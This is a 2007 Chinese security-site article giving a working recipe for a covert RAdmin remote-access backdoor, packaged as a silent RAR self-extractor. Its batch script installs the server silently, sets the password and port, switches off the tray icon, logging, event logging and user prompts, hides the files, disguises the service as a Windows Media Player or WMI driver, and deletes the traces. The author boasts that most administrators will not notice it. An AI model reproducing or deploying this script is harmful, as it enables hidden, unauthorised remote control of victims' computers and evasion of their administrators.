首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>新闻>安全新闻>文章内容
RAdmin 服务端高级配置
来源:www.vfocus.net 作者:vfocus 发布时间:2007-01-31  
RAdmin 服务端高级配置

为了方便安装。我们制作一个rar自解程序。你们应该会吧。。

 

我们建一个bat文件,内容如下:

net stop r_server

保存为1.bat文件。作用:以防万一

在建一个bat,内容如下:


@echo off
@system.exe /uninstall /silence
@system.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>>

c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>>

c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo

"Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7>>

c:\server.reg
echo "Port"=hex:7a,00,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg>> c:\server.reg
@regedit /s c:\server.reg
@net start r_server
@attrib +r +h %systemroot%\system32\drivers\system.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动

媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
@del c:\server.reg /f /q

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"
@del %systemroot%\system32\haha.exe /f /q
@del %systemroot%\system32\drivers\sc.exe /f /q
@del %systemroot%\system32\drivers\1.bat /f /q
@del %systemroot%\system32\drivers\2.bat /f /q

保存为2.bat文件 ,文件。。。。实际应用中注意:

1."Port"=hex:7a,00,00,00,换成你的radmin中reg文件中的相应内容,这个是

端口

2."Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7这个

是密码。。换成相应的即可

3.其他默认,大家应该知道了。。我没有使用注册表,而是bat,原因(1.我喜

欢bat,嘿嘿。。。)

4.配置RAR高级自解压缩选项嘀时候。。注意那个解压路径 写成%systemroot%

\system32\drivers这个
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入2.bat
步骤3 在『解压前运行』输入1.bat
步骤4 选择RAR高级自解压缩中的『模式』 改两个地方 选择『全部隐藏』和『

覆盖所有文件』

5.把你的r_server改名成system

6.RAR打包的时候不要忘记了SC这个程序

在上面我使用到了几个隐藏技巧。。

1.使用了attrib命令

2.利用注册表中的服务说明。。就是下面这一段
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动

媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q

大家应该可以看懂

3.使用SC改变了r_server服务名

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"

有了以上的几步。。很多管理员都不会查出来。。当然普通人更不会了

大家选择一个好的端口就行了。。。如果要替换服务。。自己加几个命令在

2.bat中就是了。。

优点:
1.在 系统服务 中看见的是Windows Management Instrumentation Player

Drivers 服务 (可以自定义)
2.服务说明是 提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全

协议服务
3.在cmd下面 使用net start 看见的自起动服务是Windows Management

Instrumentation Player Drivers
4.在进程中看见的是system(可以自定义,在2.bat文件中相应的地方改一下,

注意不要和已有的系统进程起冲突)

以上的程序。。SC,还有经过处理的RAdmin的服务端

这个就是我使用的。。有好的给我提提意见(替换服务出外)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·几个常见的CGI攻击方法
·linux/x86 add root user r00t w
·利用SSL漏洞 专家几分钟攻破微软
·二代身份证可能导致身份信息泄露
·外泄Windows代码者来自微软合作
·呵呵~今天换服务器了
·美国老牌黑客往事:控制电台全部
·支付宝控件漏洞——到底是谁在撒
·Halflife 3.1.1.1 - Remote expl
·我国首破病毒大案 熊猫烧香作者
·“互联网之父”建议深入研究安全
·RAdmin 服务端高级配置
  相关文章
·RAdmin 服务端高级配置
·Mercur Messaging 2005 IMAP Rem
·Xlight FTP服务器存在目录遍历/D
·linux/x86 add root user r00t w
·miniBB <= 2.0.2 (bb_func_tx
·RevilloC MailServer 1.x (RCPT
·利用MS05-039漏洞传播的蠕虫公告
·Microsoft Internet Explorer ja
·超文本传输协议有漏洞,导致新型
·pst.advisory : gxine remote ex
·pst.advisory: gedit fun. opens
·Golden FTP Server Pro Remote U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved